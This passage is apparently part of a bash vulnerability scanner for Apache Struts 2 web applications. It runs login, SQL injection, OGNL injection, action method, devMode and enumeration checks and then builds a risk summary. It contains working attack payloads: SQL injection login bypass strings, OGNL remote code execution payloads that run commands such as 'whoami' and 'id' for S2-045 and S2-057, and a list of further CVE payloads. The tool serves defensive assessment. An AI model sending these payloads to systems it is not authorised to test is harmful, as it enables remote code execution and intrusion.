        echo -e "${GRAY}To enable: Use --auth-type=form --login-url=/login.action --username=user --password=pass${NC}"
        return 0
    fi
    
    echo -e "${CYAN} Authentication Configuration:${NC}"
    echo -e "${BLUE}  Type: ${AUTH_TYPE}${NC}"
    echo -e "${BLUE}  Login URL: ${LOGIN_URL}${NC}"
    echo -e "${BLUE}  Username: ${USERNAME}${NC}"
    echo -e "${BLUE}  Session Cookie: ${SESSION_COOKIE}${NC}"
    echo ""
    
    # Test 1: Login Form Discovery
    echo -e "${CYAN} Test 1: Login Form Discovery${NC}"
    if [ -n "$LOGIN_URL" ]; then
        local login_page=$(curl -s "${TARGET_URL}${LOGIN_URL}" 2>/dev/null || echo "")
        if echo "$login_page" | grep -qi "<form"; then
            echo -e "${GREEN} Login form found at ${LOGIN_URL}${NC}"
            TESTS_PASSED=$((TESTS_PASSED + 1))
        else
            echo -e "${YELLOW} Login form not detected at ${LOGIN_URL}${NC}"
            TESTS_FAILED=$((TESTS_FAILED + 1))
        fi
        TESTS_TOTAL=$((TESTS_TOTAL + 1))
    fi
    
    # Test 2: Attempt Login with CSRF token extraction
    echo -e "\n${CYAN} Test 2: Authentication Attempt${NC}"
    if [ "$AUTH_TYPE" = "form" ] && [ -n "$USERNAME" ] && [ -n "$PASSWORD" ]; then
        # First, get login page to extract CSRF token
        local login_page=$(curl -s -c /tmp/struts_cookies_pre_$$.txt "${TARGET_URL}${LOGIN_URL}" 2>/dev/null || echo "")
        
        # Try to extract CSRF token from login page
        local csrf_token=""
        if echo "$login_page" | grep -qiE "${CSRF_TOKEN_NAME}|<s:token|struts.*token"; then
            # Try multiple extraction patterns
            csrf_token=$(echo "$login_page" | grep -oE "name=\"${CSRF_TOKEN_NAME}\"[^>]*value=\"[^\"]+\"" | grep -oE 'value="[^"]+"' | cut -d'"' -f2 | head -1)
            if [ -z "$csrf_token" ]; then
                csrf_token=$(echo "$login_page" | grep -oE "${CSRF_TOKEN_NAME}[^>]*value=\"[^\"]+\"" | grep -oE 'value="[^"]+"' | cut -d'"' -f2 | head -1)
            fi
            if [ -z "$csrf_token" ]; then
                csrf_token=$(echo "$login_page" | grep -oE 'name="token"[^>]*value="[^"]+"' | grep -oE 'value="[^"]+"' | cut -d'"' -f2 | head -1)
            fi
            
            if [ -n "$csrf_token" ]; then
                echo -e "${CYAN} CSRF token extracted: ${csrf_token:0:20}...${NC}"
                CSRF_TOKEN_VALUE="$csrf_token"
                CSRF_TOKEN_EXTRACTED=true
            fi
        fi
        
        # Perform login with CSRF token if available
        local login_data="username=${USERNAME}&password=${PASSWORD}"
        if [ -n "$csrf_token" ]; then
            login_data="${login_data}&${CSRF_TOKEN_NAME}=${csrf_token}"
        fi
        
        local login_response=$(curl -s -b /tmp/struts_cookies_pre_$$.txt -c /tmp/struts_cookies_$$.txt \
            -d "${login_data}" \
            "${TARGET_URL}${LOGIN_URL}" 2>/dev/null || echo "")
        
        # Check for success indicators
        if [ -n "$SUCCESS_INDICATOR" ] && echo "$login_response" | grep -qi "$SUCCESS_INDICATOR"; then
            echo -e "${GREEN} Login successful (found success indicator: '$SUCCESS_INDICATOR')${NC}"
            AUTHENTICATED=true
            
            # Robust session cookie extraction from Netscape cookie file format
            if [ -f "/tmp/struts_cookies_$$.txt" ]; then
                # Netscape format: domain flag path secure expiration name value
                # Extract the value (7th field) for the session cookie
                SESSION_COOKIE_VALUE=$(grep -E "[[:space:]]${SESSION_COOKIE}[[:space:]]" /tmp/struts_cookies_$$.txt 2>/dev/null | tail -1 | awk '{print $7}')
                
                # Fallback: try different formats
                if [ -z "$SESSION_COOKIE_VALUE" ]; then
                    SESSION_COOKIE_VALUE=$(grep "${SESSION_COOKIE}" /tmp/struts_cookies_$$.txt 2>/dev/null | tail -1 | awk '{print $NF}')
                fi
                
                if [ -n "$SESSION_COOKIE_VALUE" ]; then
                    echo -e "${CYAN} Session Cookie: ${SESSION_COOKIE}=${SESSION_COOKIE_VALUE}${NC}"
                else
                    echo -e "${YELLOW} Could not extract session cookie value${NC}"
                fi
            fi
            TESTS_PASSED=$((TESTS_PASSED + 1))
        elif [ -n "$FAILURE_INDICATOR" ] && echo "$login_response" | grep -qi "$FAILURE_INDICATOR"; then
            echo -e "${RED} Login failed (found failure indicator: '$FAILURE_INDICATOR')${NC}"
            TESTS_FAILED=$((TESTS_FAILED + 1))
        else
            echo -e "${YELLOW} Login result unclear (no success/failure indicators matched)${NC}"
            echo -e "${GRAY}Hint: Set --success-indicator and --failure-indicator for better detection${NC}"
            TESTS_FAILED=$((TESTS_FAILED + 1))
        fi
        TESTS_TOTAL=$((TESTS_TOTAL + 1))
        LOGIN_TESTED=true
        
        # Clean up pre-login cookies
        rm -f /tmp/struts_cookies_pre_$$.txt
    fi
    
    # Test 3: SQL Injection in Login
    echo -e "\n${CYAN} Test 3: SQL Injection in Authentication${NC}"
    local sqli_payloads=("admin' OR '1'='1" "admin'--" "' OR 1=1 --")
    local sqli_found=false
    for payload in "${sqli_payloads[@]}"; do
        local sqli_response=$(curl -s \
            -d "username=${payload}&password=anything" \
            "${TARGET_URL}${LOGIN_URL}" 2>/dev/null || echo "")
        
        if echo "$sqli_response" | grep -qiE "(welcome|dashboard|logged.*in|admin.*panel)"; then
            echo -e "${RED} SQL Injection vulnerability detected in login!${NC}"
            echo -e "${YELLOW}Payload: $payload${NC}"
            get_finding_details "Auth-Bypass"
            echo ""
            HIGH_RISK_FINDINGS=$((HIGH_RISK_FINDINGS + 1))
            HIGH_RISK_LIST+=("SQL Injection in Authentication (payload: $payload)")
            TESTS_FAILED=$((TESTS_FAILED + 1))
            sqli_found=true
            break
        fi
    done
    if [ "$sqli_found" = false ]; then
        echo -e "${GREEN} No SQL injection detected in login form${NC}"
        TESTS_PASSED=$((TESTS_PASSED + 1))
    fi
    TESTS_TOTAL=$((TESTS_TOTAL + 1))
    
    # Test 4: Session Management
    echo -e "\n${CYAN} Test 4: Session Management Security${NC}"
    if [ "$AUTHENTICATED" = true ] && [ -f "/tmp/struts_cookies_$$.txt" ]; then
        local cookie_content=$(cat /tmp/struts_cookies_$$.txt)
        
        # Check for secure flag
        if echo "$cookie_content" | grep -q "#HttpOnly"; then
            echo -e "${GREEN} HttpOnly flag present on cookies${NC}"
            TESTS_PASSED=$((TESTS_PASSED + 1))
        else
            echo -e "${YELLOW} HttpOnly flag missing on session cookies${NC}"
            MEDIUM_RISK_FINDINGS=$((MEDIUM_RISK_FINDINGS + 1))
            MEDIUM_RISK_LIST+=("Missing HttpOnly flag on session cookies")
            TESTS_FAILED=$((TESTS_FAILED + 1))
        fi
        TESTS_TOTAL=$((TESTS_TOTAL + 1))
        
        # Check for secure flag (HTTPS only)
        if [[ "$TARGET_URL" == https://* ]]; then
            if echo "$cookie_content" | grep -q "Secure"; then
                echo -e "${GREEN} Secure flag present on cookies${NC}"
                TESTS_PASSED=$((TESTS_PASSED + 1))
            else
                echo -e "${YELLOW} Secure flag missing on HTTPS site${NC}"
                MEDIUM_RISK_FINDINGS=$((MEDIUM_RISK_FINDINGS + 1))
                MEDIUM_RISK_LIST+=("Missing Secure flag on session cookies")
                TESTS_FAILED=$((TESTS_FAILED + 1))
            fi
            TESTS_TOTAL=$((TESTS_TOTAL + 1))
        fi
        
        # Clean up cookie file
        rm -f /tmp/struts_cookies_$$.txt
    fi
    
    # Test 5: CSRF Token Validation and Authenticated Action Testing
    echo -e "\n${CYAN} Test 5: CSRF Token Protection & Authenticated Actions${NC}"
    if [ -n "$LOGIN_URL" ]; then
        local form_page=$(curl -s "${TARGET_URL}${LOGIN_URL}" 2>/dev/null || echo "")
        
        # Check for Struts 2 token
        if echo "$form_page" | grep -qiE "${CSRF_TOKEN_NAME}|<s:token|struts.*token"; then
            echo -e "${GREEN} CSRF token detected in form${NC}"
            
            # If authenticated and token was extracted, test authenticated actions
            if [ "$AUTHENTICATED" = true ] && [ "$CSRF_TOKEN_EXTRACTED" = true ] && [ -n "$SESSION_COOKIE_VALUE" ]; then
                echo -e "${CYAN} Testing authenticated action with CSRF token...${NC}"
                
                # Test common edit/update actions that should require CSRF
                local test_actions=("edit.action" "update.action" "delete.action" "save.action")
                for action in "${test_actions[@]}"; do
                    # Test WITHOUT CSRF token (should fail)
                    local no_csrf_response=$(curl -s -o /dev/null -w "%{http_code}" \
                        -b "${SESSION_COOKIE}=${SESSION_COOKIE_VALUE}" \
                        -d "test=data" \
                        "${TARGET_URL}/${action}" 2>/dev/null || echo "000")
                    
                    # Test WITH CSRF token (should succeed if endpoint exists)
                    local with_csrf_response=$(curl -s -o /dev/null -w "%{http_code}" \
                        -b "${SESSION_COOKIE}=${SESSION_COOKIE_VALUE}" \
                        -d "test=data&${CSRF_TOKEN_NAME}=${CSRF_TOKEN_VALUE}" \
                        "${TARGET_URL}/${action}" 2>/dev/null || echo "000")
                    
                    # Check if action exists and CSRF is enforced
                    if [ "$no_csrf_response" != "404" ] && [ "$with_csrf_response" != "404" ]; then
                        if [ "$no_csrf_response" = "200" ] && [ "$with_csrf_response" = "200" ]; then
                            echo -e "${YELLOW} Action ${action} may not enforce CSRF protection${NC}"
                            MEDIUM_RISK_FINDINGS=$((MEDIUM_RISK_FINDINGS + 1))
                            MEDIUM_RISK_LIST+=("Possible CSRF protection bypass on ${action}")
                        fi
                        break  # Found an action to test, that's enough
                    fi
                done
            fi
            
            TESTS_PASSED=$((TESTS_PASSED + 1))
        else
            echo -e "${YELLOW} No CSRF token found in login form${NC}"
            get_finding_details "CSRF-Token-Missing"
            echo ""
            MEDIUM_RISK_FINDINGS=$((MEDIUM_RISK_FINDINGS + 1))
            MEDIUM_RISK_LIST+=("Missing CSRF token in authentication forms")
            TESTS_FAILED=$((TESTS_FAILED + 1))
        fi
        TESTS_TOTAL=$((TESTS_TOTAL + 1))
    fi
    
    echo -e "\n${GREEN} Authentication security testing completed${NC}"
}

# ===========================================
# NEW PHASE 8: STRUTS 2 OGNL INJECTION TESTING
# ===========================================

run_ognl_injection_tests() {
    local phase_display=${PHASE_NUM:-8}
    echo -e "\n${YELLOW} PHASE $phase_display: STRUTS 2 OGNL INJECTION TESTING ${NC}"
    echo -e "${RED} Testing for Remote Code Execution vulnerabilities${NC}"
    
    # OGNL Injection payloads - covering major Struts 2 CVEs
    # S2-045, S2-046, S2-048, S2-057, S2-059, S2-062
    
    echo -e "\n${CYAN} Test 1: Content-Type OGNL Injection (S2-045, S2-046)${NC}"
    local ognl_content_type_payload="%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo OGNL_VULN_DETECTED').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start())}"
    
    local ognl_response=$(curl -s -H "Content-Type: ${ognl_content_type_payload}" \
        "${TARGET_URL}/" 2>/dev/null || echo "")
    
    if echo "$ognl_response" | grep -qiE "(ognl|exception|error.*ognl|struts.*problem)"; then
        echo -e "${YELLOW} Possible OGNL injection vulnerability detected (error-based)${NC}"
        get_finding_details "OGNL-Injection"
        echo ""
        HIGH_RISK_FINDINGS=$((HIGH_RISK_FINDINGS + 1))
        HIGH_RISK_LIST+=("OGNL Injection via Content-Type (S2-045/046)")
        OGNL_VULNERABILITIES_FOUND=$((OGNL_VULNERABILITIES_FOUND + 1))
        TESTS_FAILED=$((TESTS_FAILED + 1))
    else
        echo -e "${GREEN} Content-Type OGNL injection not detected${NC}"
        TESTS_PASSED=$((TESTS_PASSED + 1))
    fi
    TESTS_TOTAL=$((TESTS_TOTAL + 1))
    
    # Test 2: Redirect parameter OGNL injection (S2-057)
    echo -e "\n${CYAN} Test 2: Redirect Parameter OGNL Injection (S2-057)${NC}"
    local redirect_ognl="redirect:\${%23req%3d%23context.get('co'%2b'm.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder('whoami'.toString().split('\\\\s'))).start().getInputStream()).useDelimiter('\\\\AAAA'),%23str%3d%23s.hasNext()?%23s.next():'',%23resp%3d%23context.get('co'%2b'm.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23resp.setCharacterEncoding('UTF-8'),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()}"
    
    local redirect_response=$(curl -s "${TARGET_URL}/?redirect=${redirect_ognl}" 2>/dev/null || echo "")
    
    if echo "$redirect_response" | grep -qiE "(ognl|redirect.*error|invalid.*redirect)"; then
        echo -e "${YELLOW} Possible redirect-based OGNL vulnerability${NC}"
        get_finding_details "OGNL-Injection"
        echo ""
        HIGH_RISK_FINDINGS=$((HIGH_RISK_FINDINGS + 1))
        HIGH_RISK_LIST+=("OGNL Injection via redirect parameter (S2-057)")
        OGNL_VULNERABILITIES_FOUND=$((OGNL_VULNERABILITIES_FOUND + 1))
        TESTS_FAILED=$((TESTS_FAILED + 1))
    else
        echo -e "${GREEN} Redirect OGNL injection not detected${NC}"
        TESTS_PASSED=$((TESTS_PASSED + 1))
    fi
    TESTS_TOTAL=$((TESTS_TOTAL + 1))
    
    # Test 3: URL parameter OGNL injection
    echo -e "\n${CYAN} Test 3: URL Parameter OGNL Injection${NC}"
    local url_ognl_payloads=(
        "%{#context['xwork.MethodAccessor.denyMethodExecution']=false}"
        "%{@java.lang.System@getProperty('user.name')}"
        "\${@java.lang.System@getProperty('os.name')}"
    )
    
    local ognl_found=false
    for payload in "${url_ognl_payloads[@]}"; do
        local encoded_payload=$(echo "$payload" | sed 's/ /%20/g' | sed 's/{/%7B/g' | sed 's/}/%7D/g')
        local param_response=$(curl -s "${TARGET_URL}/?test=${encoded_payload}" 2>/dev/null || echo "")
        
        if echo "$param_response" | grep -qiE "(ognl.*exception|struts.*problem|evaluation.*error)"; then
            echo -e "${YELLOW} OGNL evaluation detected in URL parameters${NC}"
            echo -e "${YELLOW}Payload: $payload${NC}"
            ognl_found=true
            HIGH_RISK_FINDINGS=$((HIGH_RISK_FINDINGS + 1))
            HIGH_RISK_LIST+=("OGNL Injection via URL parameters")
            OGNL_VULNERABILITIES_FOUND=$((OGNL_VULNERABILITIES_FOUND + 1))
            TESTS_FAILED=$((TESTS_FAILED + 1))
            break
        fi
    done
    
    if [ "$ognl_found" = false ]; then
        echo -e "${GREEN} URL parameter OGNL injection not detected${NC}"
        TESTS_PASSED=$((TESTS_PASSED + 1))
    fi
    TESTS_TOTAL=$((TESTS_TOTAL + 1))
    
    # Deep OGNL scan (if enabled) - Comprehensive CVE coverage
    if [ "$OGNL_DEEP_SCAN" = true ]; then
        echo -e "\n${CYAN} Test 4: Deep OGNL Scan (Comprehensive CVE Coverage)${NC}"
        echo -e "${YELLOW} Testing S2-001, S2-003, S2-005, S2-007, S2-008, S2-009, S2-012, S2-013, S2-015, S2-016${NC}"
        echo -e "${YELLOW} Plus S2-029, S2-032, S2-033, S2-037, S2-045, S2-046, S2-048, S2-053, S2-057, S2-059, S2-062${NC}"
        
        # Additional OGNL payloads for various CVEs
        local deep_ognl_payloads=(
            # S2-001, S2-003, S2-005 - Parameter injection
            "%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'whoami'})).start()}"
            "%{#_memberAccess['allowStaticMethodAccess']=true}"
            
            # S2-007, S2-008, S2-009 - Conversion errors and validation
            "age=1&name=%{#context['xwork.MethodAccessor.denyMethodExecution']=false}"
            
            # S2-012, S2-013 - Action redirect
            "redirect:%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'id'})).start()}"
            "redirectAction:%{#context['xwork.MethodAccessor.denyMethodExecution']=false}"
            
            # S2-015, S2-016 - Wildcard matching
            "*{#context['xwork.MethodAccessor.denyMethodExecution']=false}"
            "\${#context['xwork.MethodAccessor.denyMethodExecution']=false}"
            
            # S2-029 - Tag attributes
            "%{(#_='multipart/form-data').(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)}"
            
            # S2-032, S2-033 - DMI (Dynamic Method Invocation)
            "method:%{#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS}"
            
            # S2-037 - REST plugin
            "class.classLoader.resources.dirContext.docBase=."
            
            # S2-053 - Freemarke
            "%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)}"
            
            # S2-059 - Skillful match in tag attributes
            "%{(#context['xwork.MethodAccessor.denyMethodExecution']=false)(#_memberAccess['allowStaticMethodAccess']=true)}"
            
            # S2-062 - ParameterIntercepto
            "class['classLoader']['resources']['dirContext']['docBase']"
        )
        
        echo -e "${CYAN}Testing ${#deep_ognl_payloads[@]} additional OGNL injection vectors...${NC}"
        local deep_vulns_found=0
        
        # Test payloads against common endpoints
        local test_endpoints=("" "/index.action" "/login.action" "/user.action" "/admin.action")
        
        for endpoint in "${test_endpoints[@]}"; do
            for payload in "${deep_ognl_payloads[@]}"; do
                # Test as URL paramete
                local response=$(curl -s -m 3 "${TARGET_URL}${endpoint}?test=${payload}" 2>/dev/null || echo "")
                
                # Check for OGNL execution indicators
                if echo "$response" | grep -qiE "(ognl.*exception|ognl.*error|expression.*evaluation|java\\.lang|ProcessBuilder|memberAccess|xwork\\.MethodAccessor)"; then
                    echo -e "${RED} Deep scan OGNL vulnerability at: ${endpoint}${NC}"
                    echo -e "${YELLOW}   Payload matched OGNL execution pattern${NC}"
                    HIGH_RISK_FINDINGS=$((HIGH_RISK_FINDINGS + 1))
                    HIGH_RISK_LIST+=("OGNL vulnerability (deep scan) at ${endpoint}")
                    OGNL_VULNERABILITIES_FOUND=$((OGNL_VULNERABILITIES_FOUND + 1))
                    deep_vulns_found=$((deep_vulns_found + 1))
                    break 2  # Found vulnerability, no need to test more
                fi
            done
        done
        
        # Test Content-Type based injection on common actions
        echo -e "${CYAN}Testing Content-Type OGNL injection on action endpoints...${NC}"
        local common_actions=("login.action" "index.action" "admin.action" "user.action" "default.action")
        for action in "${common_actions[@]}"; do
            local action_url="${TARGET_URL}/${action}"
            local action_response=$(curl -s -m 3 -H "Content-Type: %{1+1}" "$action_url" 2>/dev/null || echo "")
            
            if echo "$action_response" | grep -qiE "(ognl|expression.*evaluation|2.*multipart)"; then
                echo -e "${YELLOW} Content-Type OGNL evaluation at: ${action}${NC}"
                MEDIUM_RISK_FINDINGS=$((MEDIUM_RISK_FINDINGS + 1))
                MEDIUM_RISK_LIST+=("Possible OGNL evaluation at ${action}")
                deep_vulns_found=$((deep_vulns_found + 1))
            fi
        done
        
        if [ $deep_vulns_found -eq 0 ]; then
            echo -e "${GREEN} No additional OGNL vulnerabilities in deep scan${NC}"
        else
            echo -e "${RED} Deep scan found $deep_vulns_found additional OGNL issues${NC}"
        fi
        echo -e "${GREEN} Deep OGNL scan completed (tested ${#deep_ognl_payloads[@]} payloads)${NC}"
    fi
    
    # Summary
    if [ $OGNL_VULNERABILITIES_FOUND -gt 0 ]; then
        echo -e "\n${RED} CRITICAL: $OGNL_VULNERABILITIES_FOUND OGNL injection vulnerabilities found!${NC}"
        echo -e "${RED} IMMEDIATE ACTION REQUIRED - Remote Code Execution possible${NC}"
        echo -e "${YELLOW} Recommended: Upgrade to latest Struts 2 version immediately${NC}"
    else
        echo -e "\n${GREEN} No OGNL injection vulnerabilities detected${NC}"
    fi
}

# ===========================================
# NEW PHASE 9: ACTION METHOD SECURITY TESTING
# ===========================================

run_action_method_tests() {
    local phase_display=${PHASE_NUM:-9}
    echo -e "\n${YELLOW} PHASE $phase_display: STRUTS 2 ACTION METHOD SECURITY ${NC}"
    
    # Test direct method invocation
    echo -e "\n${CYAN} Test 1: Direct Action Method Invocation${NC}"
    local action_methods=("execute" "input" "delete" "update" "admin" "list")
    local base_actions=("login" "user" "admin" "action" "default")
    
    for base in "${base_actions[@]}"; do
        for method in "${action_methods[@]}"; do
            local method_url="${TARGET_URL}/${base}!${method}.action"
            local response=$(curl -s -o /dev/null -w "%{http_code}" "$method_url" 2>/dev/null || echo "000")
            
            if [ "$response" = "200" ] || [ "$response" = "302" ]; then
                echo -e "${YELLOW} Exposed method: ${base}!${method}.action (HTTP $response)${NC}"
                HIGH_RISK_FINDINGS=$((HIGH_RISK_FINDINGS + 1))
                HIGH_RISK_LIST+=("Exposed action method: ${base}!${method}.action")
                ACTION_METHOD_ISSUES=$((ACTION_METHOD_ISSUES + 1))
                TESTS_FAILED=$((TESTS_FAILED + 1))
                TESTS_TOTAL=$((TESTS_TOTAL + 1))
                break
            fi
        done
    done
    
    if [ $ACTION_METHOD_ISSUES -eq 0 ]; then
        echo -e "${GREEN} No direct method invocation vulnerabilities detected${NC}"
        TESTS_PASSED=$((TESTS_PASSED + 1))
        TESTS_TOTAL=$((TESTS_TOTAL + 1))
    fi
    
    # Test namespace traversal
    if [ "$NAMESPACE_TRAVERSAL" = true ]; then
        echo -e "\n${CYAN} Test 2: Namespace Traversal${NC}"
        local traversal_paths=("/../admin/" "/./admin/" "/%2e%2e/admin/")
        
        for path in "${traversal_paths[@]}"; do
            local traversal_url="${TARGET_URL}${path}index.action"
            local response=$(curl -s -o /dev/null -w "%{http_code}" "$traversal_url" 2>/dev/null || echo "000")
            
            if [ "$response" = "200" ]; then
                echo -e "${YELLOW} Namespace traversal possible: ${path}${NC}"
                MEDIUM_RISK_FINDINGS=$((MEDIUM_RISK_FINDINGS + 1))
                MEDIUM_RISK_LIST+=("Namespace traversal: ${path}")
                TESTS_FAILED=$((TESTS_FAILED + 1))
                TESTS_TOTAL=$((TESTS_TOTAL + 1))
                break
            fi
        done
        
        echo -e "${GREEN} Namespace traversal testing completed${NC}"
    fi
    
    echo -e "\n${GREEN} Action method security testing completed${NC}"
}

# ===========================================
# NEW PHASE 10: DEVMODE & STRUTS 2 ENUMERATION
# ===========================================

run_struts2_enumeration() {
    local phase_display=${PHASE_NUM:-10}
    echo -e "\n${YELLOW} PHASE $phase_display: STRUTS 2 DEVMODE & ENUMERATION ${NC}"
    
    # Test DevMode
    if [ "$DEVMODE_CHECK" = true ]; then
        echo -e "\n${CYAN} Test 1: Development Mode Detection${NC}"
        local devmode_params=("debug=xml" "debug=console" "debug=browser" "struts.devMode=true")
        
        for param in "${devmode_params[@]}"; do
            local devmode_response=$(curl -s "${TARGET_URL}/?${param}" 2>/dev/null || echo "")
            
            if echo "$devmode_response" | grep -qiE "(devmode|debug.*mode|struts.*debug|action.*mapping)"; then
                echo -e "${RED} DevMode ENABLED - Debug information exposed!${NC}"
                get_finding_details "DevMode-Enabled"
                echo ""
                HIGH_RISK_FINDINGS=$((HIGH_RISK_FINDINGS + 1))
                HIGH_RISK_LIST+=("Struts 2 DevMode Enabled")
                DEVMODE_ENABLED=true
                TESTS_FAILED=$((TESTS_FAILED + 1))
                TESTS_TOTAL=$((TESTS_TOTAL + 1))
                break
            fi
        done
        
        if [ "$DEVMODE_ENABLED" = false ]; then
            echo -e "${GREEN} DevMode not detected${NC}"
            TESTS_PASSED=$((TESTS_PASSED + 1))
            TESTS_TOTAL=$((TESTS_TOTAL + 1))
        fi
    fi
    
    # Version detection
    echo -e "\n${CYAN} Test 2: Struts 2 Version Detection${NC}"
    local version_response=$(curl -sI "${TARGET_URL}/" 2>/dev/null || echo "")
    
    if echo "$version_response" | grep -qiE "(struts|x-powered-by.*struts)"; then
        local detected_version=$(echo "$version_response" | grep -i "struts" | head -1)
        echo -e "${YELLOW} Struts version detected: ${detected_version}${NC}"
        STRUTS_VERSION_DETECTED="$detected_version"
        INFORMATIONAL_FINDINGS=$((INFORMATIONAL_FINDINGS + 1))
        INFO_LIST+=("Struts version disclosure: $detected_version")
    else
        echo -e "${GREEN} Struts version not disclosed in headers${NC}"
    fi
    
    # Action Enumeration (if enabled)
    if [ "$ACTION_ENUMERATION" = true ]; then
        echo -e "\n${CYAN} Test 3: Action Enumeration & Discovery${NC}"
        echo -e "${YELLOW} Discovering Struts 2 action mappings...${NC}"
        
        # Common Struts 2 action patterns
        local action_patterns=(
            # Authentication actions
            "login" "logout" "register" "signin" "signout"
            # User management
            "user" "profile" "account" "settings"
            # Admin actions
            "admin" "dashboard" "manage" "control"
            # CRUD operations
            "list" "view" "edit" "create" "update" "delete" "save"
            # Common business actions
            "search" "index" "home" "default" "welcome"
            # API/REST style
            "api" "rest" "service"
        )
        
        local discovered_actions=()
        local actions_found=0
        
        echo -e "${CYAN}Testing ${#action_patterns[@]} common action patterns...${NC}"
        
        for action in "${action_patterns[@]}"; do
            # Test .action extension
            local action_response=$(curl -s -o /dev/null -w "%{http_code}" "${TARGET_URL}/${action}.action" 2>/dev/null || echo "000")
            
            if [ "$action_response" = "200" ] || [ "$action_response" = "302" ] || [ "$action_response" = "500" ]; then
                echo -e "${CYAN} Found: ${action}.action (HTTP $action_response)${NC}"
                discovered_actions+=("${action}.action")
                actions_found=$((actions_found + 1))
            fi
            
            # Also test without extension (some configurations)
            local no_ext_response=$(curl -s -o /dev/null -w "%{http_code}" "${TARGET_URL}/${action}" 2>/dev/null || echo "000")
            if [ "$no_ext_response" = "200" ] || [ "$no_ext_response" = "302" ]; then
                if [ "$no_ext_response" != "$action_response" ]; then
                    echo -e "${CYAN} Found: ${action} (HTTP $no_ext_response)${NC}"
                    discovered_actions+=("${action}")
                    actions_found=$((actions_found + 1))
                fi
            fi
        done
        
        # Test for exposed namespace patterns
        echo -e "\n${CYAN}Testing namespace patterns...${NC}"
        local namespaces=("admin" "api" "secure" "private" "internal")
        
        for ns in "${namespaces[@]}"; do
            local ns_response=$(curl -s -o /dev/null -w "%{http_code}" "${TARGET_URL}/${ns}/index.action" 2>/dev/null || echo "000")
            
            if [ "$ns_response" = "200" ] || [ "$ns_response" = "302" ] || [ "$ns_response" = "401" ] || [ "$ns_response" = "403" ]; then
                echo -e "${CYAN} Found namespace: /${ns}/ (HTTP $ns_response)${NC}"
                
                if [ "$ns_response" = "200" ] || [ "$ns_response" = "302" ]; then
                    MEDIUM_RISK_FINDINGS=$((MEDIUM_RISK_FINDINGS + 1))
                    MEDIUM_RISK_LIST+=("Exposed namespace: /${ns}/")
                fi
            fi
        done
        
        if [ $actions_found -gt 0 ]; then
            echo -e "\n${GREEN} Action enumeration completed: $actions_found actions discovered${NC}"
            INFORMATIONAL_FINDINGS=$((INFORMATIONAL_FINDINGS + 1))
            INFO_LIST+=("Discovered $actions_found Struts 2 action endpoints")
        else
            echo -e "\n${YELLOW} No standard actions discovered (custom routing or restrictive config)${NC}"
        fi
    fi
    
    echo -e "\n${GREEN} Struts 2 enumeration completed${NC}"
}

# Function to generate summary
generate_summary() {
    echo -e "\n${PURPLE} SECURITY ASSESSMENT SUMMARY${NC}"
    echo -e "${PURPLE}================================${NC}"
    
    # Calculate scores
    local success_rate=0
    if [ $TESTS_TOTAL -gt 0 ]; then
        success_rate=$((TESTS_PASSED * 100 / TESTS_TOTAL))
    fi
    
    # Calculate overall risk
    local total_findings=$((HIGH_RISK_FINDINGS + MEDIUM_RISK_FINDINGS + LOW_RISK_FINDINGS))
    local risk_score=$((HIGH_RISK_FINDINGS * 10 + MEDIUM_RISK_FINDINGS * 3 + LOW_RISK_FINDINGS * 1))
    
    # Cap risk score at 100
    if [ $risk_score -gt 100 ]; then
        risk_score=100
    fi
    
    # Determine risk level
    local risk_level="LOW"
    local risk_color=$GREEN
    if [ $HIGH_RISK_FINDINGS -gt 0 ]; then
        risk_level="HIGH"
        risk_color=$RED
    elif [ $MEDIUM_RISK_FINDINGS -gt 3 ]; then
        risk_level="MEDIUM"
        risk_color=$YELLOW
    fi
    
    # Display summary
    echo -e "${BLUE}Target: $TARGET_URL${NC}"
    echo -e "${BLUE}Scan Date: $(date)${NC}"
    echo -e "${BLUE}Test Success Rate: $success_rate% ($TESTS_PASSED/$TESTS_TOTAL)${NC}"
    echo -e "${risk_color}Overall Risk Level: $risk_level${NC}"
    echo -e "${BLUE}Risk Score: $risk_score/100 (lower is better)${NC}"
    
    if [ $HIGH_RISK_FINDINGS -gt 0 ] || [ $MEDIUM_RISK_FINDINGS -gt 0 ] || [ $LOW_RISK_FINDINGS -gt 0 ] || [ $INFORMATIONAL_FINDINGS -gt 0 ]; then
        echo -e "\n${YELLOW} DETAILED VULNERABILITY FINDINGS:${NC}"
        
        # High Risk Findings
        if [ $HIGH_RISK_FINDINGS -gt 0 ]; then
            echo -e "\n${RED} HIGH RISK FINDINGS ($HIGH_RISK_FINDINGS):${NC}"
            for finding in "${HIGH_RISK_LIST[@]}"; do
                echo -e "${RED}    $finding${NC}"
                # Add detailed info for Vulnerable JS Library
                if [[ "$finding" == "Vulnerable JS Library" ]]; then
                    if command -v jq >/dev/null 2>&1; then
                        vuln_details=$(curl -s "http://${ZAP_HOST}:${ZAP_PORT}/JSON/core/view/alerts/" 2>/dev/null | jq -r '.alerts[] | select(.risk == "High" and .name == "Vulnerable JS Library") | .other' 2>/dev/null | head -1)
                        if [[ "$vuln_details" =~ nextjs.*version.*([0-9]+\.[0-9]+\.[0-9]+) ]]; then
                            echo -e "${RED}      Library: Next.js ${BASH_REMATCH[1]}${NC}"
                            echo -e "${RED}      Multiple CVEs detected (CVE-2024-47831, CVE-2024-56332, etc.)${NC}"
                            echo -e "${RED}      Fix: Upgrade to Next.js 14.2.15+ or latest${NC}"
                        fi
                    fi
                fi
            done
